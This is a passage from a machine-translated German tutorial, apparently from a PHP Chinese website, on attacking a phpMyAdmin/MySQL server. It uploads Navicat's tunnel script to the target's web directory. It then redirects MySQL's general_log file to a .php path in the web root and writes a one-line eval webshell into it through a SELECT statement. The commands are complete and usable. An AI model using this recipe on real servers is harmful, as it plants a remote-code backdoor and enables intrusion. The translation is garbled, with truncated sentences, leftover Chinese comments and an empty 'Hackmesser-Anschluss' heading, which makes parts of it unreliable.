Das Folgende ist ein Penetrationstest von Phpmyadmin aus der Tutorial-Kolumne von phpmyadmin. Ich hoffe, er wird Freunden in Not helfen!
Der Versuch, Navicate für die Datenbankverbindung zu verwenden, gibt an, dass die Remoteverbindung zur Datenbank verboten ist :?? Datenbank) im Navicat-Installationsverzeichnis in ein beliebiges Website-Verzeichnis des Zielservers (später nach getshell hochgeladen)
Hochgeladen in das Verzeichnis D:/phpStudy/WWW, um auf http://XXX/ntunnel_mysql.php zuzugreifen Der Test war erfolgreich
Testverbindung: (Öffnen Sie zu diesem Zeitpunkt Navicat lokal und konfigurieren Sie die http-Verbindung. Die Kanaladresse hier ist die URL, die Sie oben besucht haben. Um es klar auszudrücken: Es handelt sich um einen Proxy. Aktivieren Sie das Kontrollkästchen, um die Base64-Kodierung zu verwenden, um zu verhindern, dass WAF Probleme verursacht. Geben Sie dann localhost als Hostnamen und das Kontokennwort ein. Das Konto des lokalen Datenbankbenutzers von lnmp01 reicht aus, da Sie eine Verbindung zum lokalen MySQL von lnmp01 herstellen müssen )
Phpmyadmin Get Shell:
Verwenden Sie die ProtokolldateiMySQL Version 5.0 und höher erstellt eine Protokolldatei und ändert die globale Protokolldatei. Variablen können auch mit getshell verwendet werden. Sie müssen aber auch über Lese- und Schreibberechtigungen für die generierten Protokolle verfügen.set global general_log = "ON"; #当开启general时,所执行的sql语句都会出现在WIN-30DFNC8L78A.log文件那么,如果修改general_log_file的值,那么所执行的sql语句就会对应生成进而getshell SET global general_log_file='D:/phpStudy/WWW/test1234.php'; #对应就会生成test1234.php文件 select '<?php eval($_POST[2019]);?>'; #将一句话木马写入test1234.php文件
Hackmesser-Anschluss:
Das obige ist der detaillierte Inhalt vonTeilen Sie einen Penetrationstest von Phpmyadmin. Für weitere Informationen folgen Sie bitte anderen verwandten Artikeln auf der PHP chinesischen Website!